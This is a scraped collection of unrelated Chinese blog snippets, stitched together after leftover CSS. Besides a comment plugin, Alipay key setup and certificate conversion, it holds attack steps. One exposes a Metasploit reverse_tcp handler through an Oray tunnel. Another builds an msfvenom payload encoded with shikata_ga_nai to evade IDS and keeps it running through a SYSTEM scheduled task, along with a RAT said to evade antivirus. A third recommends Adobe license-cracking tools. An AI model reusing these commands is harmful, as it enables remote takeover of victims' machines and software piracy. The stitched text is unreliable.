body{font-size:14px;font-family:arial,verdana,sans-serif;line-height:1.666;padding:0;margin:0;overflow:auto;white-space:normal;word-wrap:break-word;min-height:100px} td, input, button, select, body{font-family:Helvetica, 'Microsoft Yahei', verdana} pre {white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-pre-wrap;white-space:-o-pre-wrap;word-wrap:break-word;width:95%} th,td{font-family:arial,verdana,sans-serif;line-height:1.666} img{ border:0} header,footer,section,aside,article,nav,hgroup,figure,figcaption{display:block} blockquote{margin-right:0px} </style> <style id="ntes_link_color" type="text/css">a,td a{color:#064977}</style>效果图评论提醒效果 评论回复效果 使用下载附件,上传至plugins后台开启即可。 附件下载点击下载
  20. 前期条件需要签约当面付(可找人代开 十几元即可搞定)应用以上线 需要下载RSA签名验签工具点我下载 参数配置运行RSA签名验签工具 点击生成密匙 如下,会生成相应的公匙和密匙 保存公匙和密匙 打开蚂蚁金服开发平台 打开应该公匙将我们刚才保存的公匙填入即可。 然后分别记录 APPID 应用私匙 支付宝公匙即可
  21. 一:先注册花生壳并下载花生壳客户端 二:点击内网穿透 内网为你kali的ip地址,端口为5555 然后点击提交即可。 三:生成木马在生成木马时,我们需要花生壳的ip和端口 点击诊断,即可查看花生壳的ip 花生壳的端口: 域名后面的,即为花生壳的端口。 四:配置msfconsole需要注意的是,在配置msfconsole时,我们不能配置花生壳的端口和ip,应该是我们kali本机的ip和端口。 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.3.209 set LPORT 5555
  22. 软件特性本软件功能强大,由各种顶级黑客技术结合而成,基本功能覆盖面广,可满足大多数人的基本需求。 此外软件高度定制化,拥有插件功能,可使用各种强大的插件来丰富软件功能。 日站综合根据域名/IP一键攻击或一键使用0day攻击 可选各种漏洞进行一键攻击、提权 综合功能:挂黑页、DDOS、社管理员全家、日后台、挂马、断室友网 百度、谷歌批量日站、免费上网、破解各种网吧 盗QQ号、刷Q币、刷会员、刷心悦3、日运营商免费打电话充话费 进内网、翻墙、澳门赌场、IP定位、顺着网线砍人 日教务系统、挖洞、发布漏洞、自动代码审计、读内存 破解根据文件一键破解、逆源码 一键注释代码(AI)、激活系统、激活所有软件、日穿系统、生成POC 一键破解手机应用、游戏、汉化、汉化并steam差评+1 CTF一键日平台、出flag、偷flag、生成wp、搅屎、断网 一键交易、改排名、自动做题(AI) 一键锤爆出题人的头 无线 一键蹭Wifi、中间人、看妹子手机里的自拍 一键伪基站、窃听、做钓鱼Wifi 硬件 一键日无人机、日ATM、偷银行卡、充饭卡、日卫星 一键保佑服务器不宕机、日穿CPU、烧随机硬件 其它 玄学许愿,出货率UP 实验性功能(AI):一键绿帽、自动与妹子尬聊、提升好感度 插件支持各种语言(包括但不限于C(C ++)、Java、Python、Ruby、Javascript、php、C#……) 甚至,可以使用txt、exe等文件做插件 项目地址传送门
  23. 定时任务 前提: 已获得目标系统管理员组任何一个成员权限。 命令: schtasks /create /tn "system" /tr C:\Windows\client.exe /sc MINUTE /mo 1 /ru "System" /RL HIGHEST命令解释: /create =>创建任务 /tn "system" =>指定任务名称为system /tr C:\Windows\client.exe =>指定程序路径 /sc MINUTE /mo 1 =>指定类型;MINUTE表示任务每n分钟运行一次,/mo 1表示每1分钟执行一次 /ru "System" =>指定为system用户运行该任务 /RL HIGHEST =>运行级别,HIGHEST为使用最高权限运行远控这里分享一款国外的开源远控,githubgithub 地址 亲测过包括360,收费版AVG,卡巴斯基在内的大多数杀软。 生成client.exe之后放到目标机器以计划任务执行。 标上线并且获取了system权限! 再来试试msf: 首先生成木马 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.52.130 LPORT=2333 -f exe > /root/Desktop/test.exe生成后门,用shikata_ga_nai编码绕过IDS检测. 在受害机创建定时任务,msf收到回话
  24. 1.CCMaker CCMaker无疑是非常常用的一款Adboe套件安装器了,安装可选加装AMTEmu工具绕过授权验证机制,可以直接不登陆Adobe账户直接安装指定的套件,方便快捷。不过受限于国内网络环境,可能出现下载不稳定等情况。 2.嬴政天下系列 众所周知,嬴政天下系列的Adobe套件一直受到广大使用者们的喜爱,不论是长久来及时的更新,还是质量的优越都成就了如今的口碑。此系列可选完全和独立包,直装后即可使用。 3.Adobe.Anticloud插件 该插件使用方法简单,安装完所需的Adobe套件后直接安装此插件即可,原理为劫持授权检测模块。 4.amtemu插件 该插件一直以其轻巧,简介的优点为人所知,只需要选择要打补丁的程序,并且找到对应程序目录下的指定dll文件即可,效率较高。由于其高效的解决方案,因此使用时指定2017版本的程序亦可使用在2018版本程序中,不过部分版本设置可能需要修改以便达到最佳效果,此插件几乎不会触发任何安全软件警告
  25. 原因今天网站的证书快要过期了,但是下载下来发现原来的public.pem和chain.pem证书变成了.crt证书。配置老是出现错误,想着能不能将crt转换成pem。 解决方案linux命令 cat your_server1.crt COMODORSADomainValidationSecureServerCA.crt COMODORSAAddTrustCA.crt AddTrustExternalCARoot.crt > your_server2.pem 参数:your_server1.crt 表示你转格式之前的crt格式证书 参数:your_server2.pem 表示转格式之后的pem格式证书